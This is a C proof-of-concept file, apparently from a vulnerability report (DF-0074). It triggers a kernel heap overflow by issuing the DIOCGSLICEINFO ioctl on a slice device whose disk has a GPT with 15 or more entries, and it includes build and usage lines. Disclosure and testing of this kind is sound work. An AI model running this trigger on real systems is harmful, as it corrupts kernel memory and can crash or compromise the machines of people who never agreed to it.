DF-0074 / trigger.c
/* * DF-0074 trigger - issue DIOCGSLICEINFO on a slice device whose backing * disk has a GPT with >= 15 entries, causing the heap overflow in * subr_diskslice.c:557. * * Build: cc -o trigger trigger.c * Usage: ./trigger /dev/vnd0s1 */ #include <sys/ioctl.h> #include <sys/diskslice.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char **argv) { const char *dev = (argc > 1) ? argv[1] : "/dev/vnd0s1"; int fd; fd = open(dev, O_RDONLY); if (fd < 0) { perror("open"); return 1; } /* DIOCGSLICEINFO bcopy's dss_nslices-worth of struct diskslice into * a sizeof(struct diskslices) (16-slice) buffer. For a GPT disk with * >= 15 entries this overflows the kernel heap by up to ~29 KB. */ struct diskslices ds; if (ioctl(fd, DIOCGSLICEINFO, &ds) < 0) { perror("ioctl DIOCGSLICEINFO"); close(fd); return 1; } fprintf(stderr, "DIOCGSLICEINFO returned nslices=%u\n", ds.dss_nslices); close(fd); return 0; } |